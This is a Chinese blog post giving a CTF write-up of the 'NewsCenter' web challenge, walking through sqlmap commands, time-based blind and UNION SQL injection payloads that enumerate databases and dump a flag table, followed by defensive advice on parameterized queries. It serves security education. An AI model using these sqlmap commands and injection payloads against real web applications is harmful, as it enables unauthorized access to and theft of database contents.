CTF解题:NewsCenter-SQL 注入的简单利用

最新推荐文章于 2025-06-02 12:18:48 发布
最新推荐文章于 2025-06-02 12:18:48 发布
阅读量965 收藏 21
点赞数 32
分类专栏: CTF琐碎知识 文章标签: sql 数据库 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qqww22884455/article/details/148195640
版权

一、前言

在 CTF(Capture The Flag)竞赛中,SQL 注入(SQL Injection)是最为常见且经典的攻击类型之一。本文将结合一道具体的 CTF 题目,详细解析 SQL 注入漏洞的发现、利用过程,并深入探讨其背后的技术原理,帮助读者理解如何在实际场景中运用渗透测试工具与技巧。

二、题目环境与信息收集

题目链接[脱敏URL]
目标场景:一个看似普通的搜索功能页面,初步判断可能存在 POST 类型的参数提交点。

1. 流量抓取与请求分析

使用 Burp Suite 抓取搜索功能的 HTTP 请求,保存为sql.txt文件,内容如下:

POST / HTTP/1.1
Host: [脱敏域名]
Content-Length: 15
Cache-Control: max-age=0
Origin: [脱敏URL]
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: [脱敏URL]
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
search=remotely

可见,搜索参数通过 POST 请求的search字段传递,这是 SQL 注入的常见攻击点。

三、SQL 注入漏洞探测

1. 使用 sqlmap 自动化检测

第一次探测:基础测试

执行命令:

python sqlmap.py -r C:\Users\Administrator\Desktop\sql.txt -tamper=0eunion

关键输出分析

  • [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable:初步启发式检测认为参数可能不可注入。

  • [CRITICAL] considerable lagging has been detected in connection response(s):响应延迟较高,可能存在时间盲注(Time-Based Blind SQL Injection)。

第二次探测:强制测试 UNION 注入

在交互提示中选择不减少请求(n),继续测试 UNION 查询注入。最终发现:

  • 参数可注入类型:同时存在时间盲注UNION 联合查询注入

  • 数据库类型:MySQL(back-end DBMS: MySQL >= 5.0.12)。

核心 Payload 示例

# 时间盲注Payload
search=remotely' AND (SELECT 8375 FROM (SELECT(SLEEP(5)))Apbf) AND 'suFZ'='suFZ

# UNION联合查询Payload
search=remotely' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7871, ... )-- -

四、注入原理深度解析

1. 时间盲注(Time-Based Blind SQL Injection)

原理概述

当服务器对 SQL 注入的错误信息进行过滤或不返回具体结果时,攻击者通过构造带时间延迟的 SQL 语句,根据响应时间差判断注入是否成功。

  • 核心逻辑:利用SLEEP(N)函数制造延迟,若条件为真则执行延迟,否则立即返回。

  • 适用场景:页面无错误回显、无布尔值差异的场景。

攻击流程

  1. 构造判断语句:

    ' AND IF(条件, SLEEP(5), 0) --

    条件为真,则执行SLEEP(5),响应延迟 5 秒;若为假,则立即返回。

  2. 通过逐位爆破(如 ASCII 码)获取数据:

    ' AND IF((SELECT ASCII(SUBSTRING(database(), 1, 1))) = 110, SLEEP(5), 0) --

    (判断当前数据库名的第一位 ASCII 码是否为110,即字母n

2. UNION 联合查询注入(UNION Query SQL Injection)

原理概述

利用UNION ALL操作符合并多个 SQL 查询的结果,通过构造合法的联合查询,将攻击者的 Payload 插入到正常响应中,从而获取敏感数据。

  • 前提条件

    • 注入点支持 SQL 语句拼接;

    • UNION前后的查询结果列数、数据类型一致。

攻击流程

  1. 确定字段数:通过ORDER BY语句判断查询的列数,例如:

    ' ORDER BY 3 --  # 若返回正常,说明至少有3列

  2. 定位可显字段:使用NULL占位,确定哪些列的数据会显示在响应中:

    ' UNION ALL SELECT NULL, NULL, 'test' --  # 若页面显示'test',则第三列为可显字段

  3. 提取敏感数据:通过CONCAT()函数拼接数据,例如:

    ' UNION ALL SELECT NULL, NULL, CONCAT(user(), 0x3a, database()) --  # 显示当前用户和数据库名

五、漏洞利用与数据获取

1. 枚举数据库与表结构

获取所有数据库:
python sqlmap.py -r sql.txt -tamper=0eunion --dbs

结果:存在information_schemanews两个数据库。

枚举news数据库中的表:
python sqlmap.py -r sql.txt -tamper=0eunion -D news --tables

结果:发现secret_table表(疑似存储 Flag 的表)。

2. 提取 Flag 字段

获取secret_table表的列信息:
python sqlmap.py -r sql.txt -tamper=0eunion -D news -T secret_table --columns

结果:存在fl4g字段(类型为varchar)。

导出fl4g字段数据:
python sqlmap.py -r sql.txt -tamper=0eunion -D news -T secret_table -C fl4g --dump

最终 Flag

QCTF{sq1_inJec7ion_ezzz}

六、总结与防御建议

1. 技术总结

  • 注入类型判断:当页面无回显时,优先考虑时间盲注;若存在可显字段,则 UNION 注入更高效。

  • 工具使用技巧

    • tamper参数可绕过简单的 WAF 过滤(如本题使用0eunion脚本处理 UNION 关键字);

    • --dump结合 -C 可精准提取目标字段数据。

2. 防御建议

  • 输入过滤:对用户输入的参数进行严格校验,禁止包含 SQL 关键字(如UNIONSELECTSLEEP等)。

  • 预编译语句:使用参数化查询(如 PHP 的 PDO、Python 的 sqlite3 模块),避免直接拼接 SQL 语句。

  • 错误处理:禁用数据库错误信息回显,统一返回友好的提示页面,防止攻击者利用错误信息进行注入测试。

  • 安全测试:定期使用静态代码分析工具(如 SonarQube)和动态扫描工具(如 sqlmap)进行漏洞检测。

七、参考资料

攻防世界web:NewsCenter(含sqlmap基本参数讲解)
2203_75647316的博客
03-09 584
CTF中web方向sql注入的题目,包含一些sqlmap的参数讲解
CTF-WEB篇 攻防世界题目实战解析NewsCenter
2301_76565920的博客
04-29 552
题目:NewsCenter 难度:2。sql注入,union的使用
CTF_WP-攻防世界web题解
qq_63600223的博客
03-25 3584
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
CTF_WP-攻防世界web题解(1),网络安全面试资料集合
碧海朝天素
04-08 929
查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile接下看重点看checkfile函数,白名单被写死,return true的情况只有三种file在白名单中在file末尾加了个?
CTF题目合集_网络安全ctf大赛题库,2024年最新我把所有网络安全框架整理成了PDF_ctf网络安全大赛题目
2401_84578953的博客
08-02 915
GIF89a。
ctfhub and XCTF
CyhDl666的博客
02-20 427
文章目录互联网协议入门学习概述1.互联网模型1.1 互联网五层模型1.2 实体层1.3 数据链路层 互联网协议入门学习 概述 1.互联网模型 1.1 互联网五层模型 互联网由好几层组成,每层都有其不同的功能,越下面的层越是靠近硬件,我们接触的大多是应用层 互联网的每一层,都有很多的协议。这些协议的总称,就叫做"互联网协议。 1.2 实体层 实体层就是将电脑利用光缆、电缆、无线电等方式连接起来 其主要规定了网络的电气特性,负责传播0,1信号 1.3 数据链路层 功能 数据链路层的定义是将实体层传输
双剑破天门:攻防世界Web题解之独孤九剑心法(七)
安全瞭望Sec
05-04 2071
SQL注入、文件上传绕过检测、HTTP头伪造及命令注入漏洞,需通过联合查询、恶意文件构造、请求头篡改和系统命令拼接获取flag,凸显输入过滤与权限验证的关键防御意义。
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了_攻防世界web新手题答案
2401_84578953的博客
11-22 1146
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
攻防世界题目练习——Web引导模式(二)
qq_48550824的博客
10-12 992
看源码可以知道,__wakeup()函数会强制将文件名转为index.php,因此我们需要绕过__wakeup()函数,接下来执行的__destruct()函数会输出对应文件的内容,我们需要让文件名显示为我们要查看的文件。的时候的结果,也就是说,这个网页在查询数据库时,应该是默认的查询的表名为"words",查询的列名为"id",所以我们把flag所在的表名改成words,列名改成id,就可以在网页查询1时获得flag。,1后面的单引号是多余的,因此触发报错,就可以判断我们输入的参数就是单引号闭合的形式。
攻防世界-web高手进阶区
zji
04-25 6968
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-web进阶区
楼阁de猫的博客
10-30 1072
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
SQL 执行顺序详解
最新发布
hixiaoyang的博客
06-02 269
SQL执行顺序详解:逻辑顺序与物理顺序完全不同,关键执行顺序为FROM-JOIN-WHERE-GROUPBY-HAVING-SELECT-DISTINCT-ORDERBY-LIMIT(FJ-W-G-H-S-D-O-L)。FROM和JOIN首先确定数据源,随后WHERE过滤行,GROUP BY分组后HAVING过滤组,SELECT选择列并计算表达式,DISTINCT去重,最后ORDER BY排序和LIMIT限制结果。现代查询优化器会根据成本调整实际执行计划,WHERE在分组前过滤而HAVING在分组后过滤是重
如何收集Oracle DB SQL Monitor报告
huiyangxu blog
05-28 592
可以通过企业管理器云控制(Enterprise Manager Cloud Control)或企业管理器数据库 express 版(EM Express),在性能中心(通过 “性能” 菜单进入)的 “已监控 SQL” 选项卡中,直接访问活动 SQL 监视器报告。可以通过sqldeveloper 管理工具–优化–实时SQL监视,选中要生成报告的SQL,点保存按钮就可以直接保存到本地。下面是12C的示例,如果你的网络里有统一管理的EM也可以查看。工具虽然是免费的,但是前提你要有相应的授权。
PostgreSQL如何更新和删除表数据
ai agent知识
05-29 319
摘要:本文介绍了SQL中UPDATE和DELETE命令的使用方法。UPDATE用于修改数据(如将杭州5月12日气温降低2度),DELETE用于删除数据(如删除杭州的所有天气记录)。特别警告不带WHERE条件的DELETE会清空整张表,建议使用TRUNCATE命令进行表清空操作。
PostgreSQL的聚集函数
ai agent知识
05-29 548
PostgreSQL的聚集函数(如count、sum、avg、max、min)能高效处理数据统计需求。通过WHERE子句实现预筛选,GROUP BY进行分组统计,HAVING过滤分组结果,FILTER实现精细化计算控制。这些功能组合使用可精准完成数据筛选、分组和统计分析,提升数据处理效率,是数据分析中的实用工具。合理运用这些技巧能让数据库查询更加灵活高效。
经典SQL查询问题的练习第一天
2301_80002241的博客
05-29 483
本文展示了基于学生表、课程表和成绩表的8个SQL查询示例。主要包括:计算单科总成绩(①)和选课人数(②);获取各科最高最低分(③)和每门课选课人数(④);查询平均成绩高于60分(⑤)和选修3门课以上(⑥)的学生;找出有不及格记录(⑦)及两门以上不及格(⑧)的学生姓名。所有查询都基于聚合函数(SUM/COUNT/MAX/MIN/AVG)和分组(GROUP BY)操作,涉及单表查询和多表连接(LEFT JOIN),并使用了WHERE和HAVING条件筛选。
Text-to-SQL评估体系:从Spider 1.0数据集到2.0框架的跨越与革新
dudly的博客
05-29 1502
在人工智能技术蓬勃发展的浪潮中,Text-to-SQL作为连接自然语言与数据库操作的关键技术,其评估体系的迭代更新一直是推动该领域前进的重要力量。从Spider 1.0这一开创性的大规模跨领域语义解析数据集,到Spider 2.0这一革命性的企业级评估框架,Text-to-SQL技术的评估标准实现了从理论验证到实际业务赋能的重大跨越,深刻影响着整个行业的发展方向。
SQL输出20个9
chinalog的专栏
05-28 442
简单直接的方法是第一种使用REPLICATE函数,它会返回由指定字符串重复指定次数后组成的字符串。
数据库只更新特定字段的两种方式(先读后写 vs. 动态组织 SQL-golang SQLx 实现代码(动态组织 SQL
西京刀客
05-31 918
数据库只更新特定字段的两种方式(先读后写 vs. 动态组织 SQL-golang SQLx 实现代码(动态组织 SQL
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值